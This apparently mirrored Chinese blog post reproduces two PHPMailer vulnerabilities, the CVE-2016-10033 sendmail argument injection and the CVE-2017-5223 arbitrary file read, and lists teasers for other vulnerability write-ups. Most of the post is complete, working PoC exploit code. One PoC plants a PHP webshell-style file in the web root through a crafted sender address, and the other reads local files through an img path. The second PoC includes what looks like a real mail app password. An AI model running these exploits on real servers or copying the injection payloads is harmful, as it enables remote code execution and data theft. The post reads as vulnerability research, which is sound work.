PHPMailer命令執行及任意檔案讀取漏洞

阿新 • • 發佈：2018-12-23

　　今天在thinkphp官網閒逛，無意下載了一套eduaskcms，查看了一下libs目錄中居然存在PHPMailer-5.2.13，想起了之前看到的PHPMailer的漏洞，可惜這套CMS只提供了一個郵箱介面，前臺頁面需要單獨自己寫，沒辦法用這套CMS進行復現，這邊也順便利用這個PHPMailer-5.2.13對CVE-2016-10033和CVE-2017-5223進行本地復現，記錄一下。

PHPMailer 命令執行漏洞(CVE-2016-10033)

漏洞編號：CVE-2016-10033

影響版本：PHPMailer< 5.2.18

漏洞級別：高危

漏洞POC：

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
$address = " 
[email protected]"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
} else { echo "Message sent!\n"; 
}

PHPMailer任意檔案讀取漏洞分析（CVE-2017-5223）

漏洞編號： CVE-2017-5223

影響版本： PHPMailer <= 5.2.21

漏洞級別：高危

漏洞POC：根據作者的POC改了幾行，使其適用於qq郵箱

<?php  
#Author:Yxlink

require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com'; 
$mail->Port = 465; 
$mail->SMTPAuth = true; 
$mail->Username =  
[email protected]';  //qq郵箱
$mail->Password = 'zsuhxbmsaioxbcgb';//申請配置郵件客戶端獲取到的16位密碼和qq密碼不一樣
$mail->SMTPSecure = 'ssl';


$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";
 
$mail->Subject = "hello";
$mail->From = "[email protected]";  
$mail->FromName = "test";  
 
$address = "[email protected]";
$mail->AddAddress($address, "test");
 
$mail->AddAttachment('test.txt','test.txt'); 
$mail->IsHTML(true);  
$msg="<img src='D:\\1.txt'>test";
$mail->msgHTML($msg);
 
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>

最後

歡迎關注個人微信公眾號：Bypass--，每週原創一篇技術乾貨。

參考文章：

PHPMailer任意檔案讀取漏洞分析（CVE-2017-5223）http://www.freebuf.com/vuls/124820.html

PHPMailer 命令執行漏洞（CVE-2016-10033）分析 http://blog.csdn.net/wyvbboy/article/details/53969278

PHPMailer命令執行及任意檔案讀取漏洞

　　今天在thinkphp官網閒逛，無意下載了一套eduaskcms，查看了一下libs目錄中居然存在PHPMailer-5.2.13，想起了之前看到的PHPMailer的漏洞，可惜這套CMS只提供了一個郵箱介面，前臺頁面需要單獨自己寫，沒辦法用這套CMS進行復現，這邊也順便

PHPMailer命令執行及任意文件讀取漏洞

custom orm cga -s tails 文件 ack exp else 　　今天在thinkphp官網閑逛，無意下載了一套eduaskcms，查看了一下libs目錄中居然存在PHPMailer-5.2.13，想起了之前看到的PHPMailer的漏洞，可惜這套CMS只

【程式碼審計】大米CMS_V5.5.3 任意檔案讀取漏洞分析

0x00 環境準備大米CMS官網：http://www.damicms.com 網站原始碼版本：大米CMS_V5.5.3試用版(更新時間：2017-04-15) 程式原始碼下載：http://www.damicms.com/downes/dami.rar 測試網站首頁：

24.Windows任意檔案讀取漏洞

漏洞概述：近日，國外安全研究員SandboxEscaper又一次在推特上公佈了新的Windows 0 day漏洞細節及PoC。這是2018年8月開始該研究員公佈的第三個windows 0 day漏洞。此次披露的漏洞可造成任意檔案讀取。該漏洞可允許低許可權使用者或惡意程式讀取目標Windows主機上任意

WEB安全系列之如何挖掘任意檔案讀取漏洞

$fp="../template/".$siteskin."/area_show.htm"; $f = fopen($fp,'r'); $strout = fread($f,filesize($fp)); fclose($f); $strout=str_replace("{#siteskin}",$site

應用伺服器glassfish任意檔案讀取漏洞

事情就這樣默默發生了在2015年的10月3日，一位路人甲同學在烏雲上釋出了一個名為“應用伺服器glassfish存在通用任意檔案讀取漏洞”的漏洞，大致內容如下：漏洞作者：路人甲相關廠商：glassfish 漏洞編號：wooyun-2010-0144595 漏洞

PhpMyadmin任意檔案讀取漏洞

libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can

glassfish任意檔案讀取漏洞(4.0/4.1)

相關廠商：glassfish漏洞編號：wooyun-2010-0144595漏洞詳情：http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae

【程式碼審計】任意檔案讀取漏洞例項

0x00 前言　　大多數網站都提供讀取檔案功能，一般實現過程是，根據引數filename的值，獲得該檔案在網站上的絕對路徑，讀取檔案。　　這裡，通過兩個任意檔案讀取漏洞例項去展示漏洞原理、漏洞危害。 0x01 漏洞例項一環境搭建： XYHCMS官網：http:

Windows任意檔案讀取漏洞

低許可權使用者或惡意程式能夠讀取目標Windows計算機上任何檔案的內容，設想你取得了一個普通許可權，還能幹嗎，用該漏洞作者SandboxEscaper的一句話來說，也許是密碼檔案，我不夠聰明，不知道能幹嗎。漏洞故事 Twitter別名SandboxEscaper

Jenkins 任意檔案讀取漏洞分析

一、漏洞背景漏洞編號：CVE-2018-1999002 漏洞等級：高危 Jenkins 7 月 18 日的安全通告修復了多個漏洞，其中 SECURITY-914 是由 Orange （部落格連結：http://blog.orange.tw/）挖出的 Jenkins 未授權任意檔案讀取漏

Apache Solr任意檔案讀取漏洞復現

Apache Solr任意檔案讀取漏洞復現一、簡介 Solr是一個獨立的企業級搜尋應用伺服器，它對外提供類似於Web-service的API介面。使用者可以通過http請求，向搜尋引擎伺服器提交一定格式的XML檔案，生成索引；也可以通過Http Get操作提出查詢請求，並得到XML格式的返回結果。

Weblogic漏洞之弱口令、任意檔案讀取、上傳shell

弱口令環境啟動後，訪問http://192.168.1.15:7001/console/login/LoginForm.jsp，即為weblogic後臺。本環境存在弱口令可以直接登入： weblogic [email protected]

烏雲漏洞筆記1-任意檔案讀取

閱讀時間16.01.18 page1-3 敏感欄位 &RealPath= &FilePath= &filepath= &Path= &

PHPMailer 命令執行漏洞（CVE-2016-10033）分析

PHPMailer是一個基於PHP語言的郵件傳送元件，被廣泛運用於諸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等使用者量巨大的應用與框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞，攻擊者只

nm命令檢視物件，可執行及庫檔案

顯示關於物件檔案、可執行檔案以及物件檔案庫裡的符號資訊。語法 nm [ -A ] [ -C ] [ -X {32|64|32_64}] [ -f ] [ -h ] [ -l ] [ -p ] [ -r ] [ -T ] [ -v ] [ -B | -P ]

12.Weblogic 檔案讀取漏洞復現

利用docker環境模擬了一個真實的weblogic環境，其後臺存在一個弱口令，並且前臺存在任意檔案讀取漏洞。分別通過這兩種漏洞，模擬對weblogic場景的滲透。 Weblogic版本：10.3.6(11g) Java版本：1.6 弱口令環境啟動後，訪問 http://192.

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

0x00 環境準備 CLTPHP官網：http://www.cltphp.com 網站原始碼版本：CLTPHP內容管理系統5.5.3版本程式原始碼下載：https://gitee.com/chichu/cltphp 預設後臺地址： http://127.0.0.1/admin/log

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

【程式碼審計】Cscms_v4.1 任意檔案刪除漏洞例項

環境搭建： CSCMS ：http://www.chshcms.com/ 網站原始碼版本：Cscms_v4.1正式版（釋出日期：2017-06-05）程式原始碼下載：https://github.com/chshcms/cscms 漏洞例項一：漏洞檔案位

PHPMailer命令執行及任意檔案讀取漏洞

相關推薦